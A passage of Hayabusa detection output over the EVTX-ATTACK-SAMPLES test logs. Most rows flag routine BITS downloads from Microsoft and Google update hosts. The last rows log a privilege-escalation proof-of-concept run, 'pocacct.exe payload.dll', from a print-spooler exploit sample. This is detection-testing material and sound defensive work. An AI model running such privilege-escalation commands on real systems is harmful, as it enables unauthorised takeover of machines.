https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.798 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.802 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.899 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.906 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.910 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.913 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 10:56:13.148 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 12:44:50.465 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 14:12:22.524 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 14:12:25.568 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 10:12:09.946 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 10:31:57.260 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:57:22.022 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 11:47:59.752 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 11:48:00.273 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 12:31:35.114 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 13:57:53.156 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 13:57:54.168 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 17:41:01.832 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 17:41:02.662 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 21:09:43.966 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 10:01:10.759 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:45.347 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:46.212 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:57.232 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 09:04:09.949 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 09:33:33.409 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 10:45:57.562 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 17:49:15.102 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 17:49:15.960 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:12:30.660 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:12:31.102 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:16:44.077 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:18:47.864 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:01.301 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:08.126 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:17.194 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:21.164 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:25.377 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:34.726 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:50:16.788 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:50:17.148 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 15:54:58.415 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 15:54:59.449 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 16:00:56.714 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 16:00:57.346 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:46:03.984 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:46:04.676 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:52:42.355 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:52:43.097 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 11:05:14.300 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:44:11.565 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:46:56.224 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 12:46:56.973 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 14:09:10.403 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 15:34:38.147 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 15:41:52.668 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 12:47:56.181 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 12:47:57.912 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:06:52.429 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 23:55:56.229 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:56:29.274 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:57:51.221 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 09:57:59.420 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 14:04:33.703 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 14:04:36.013 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 10:44:49.642 +00:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 10:44:49.642 +00:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing 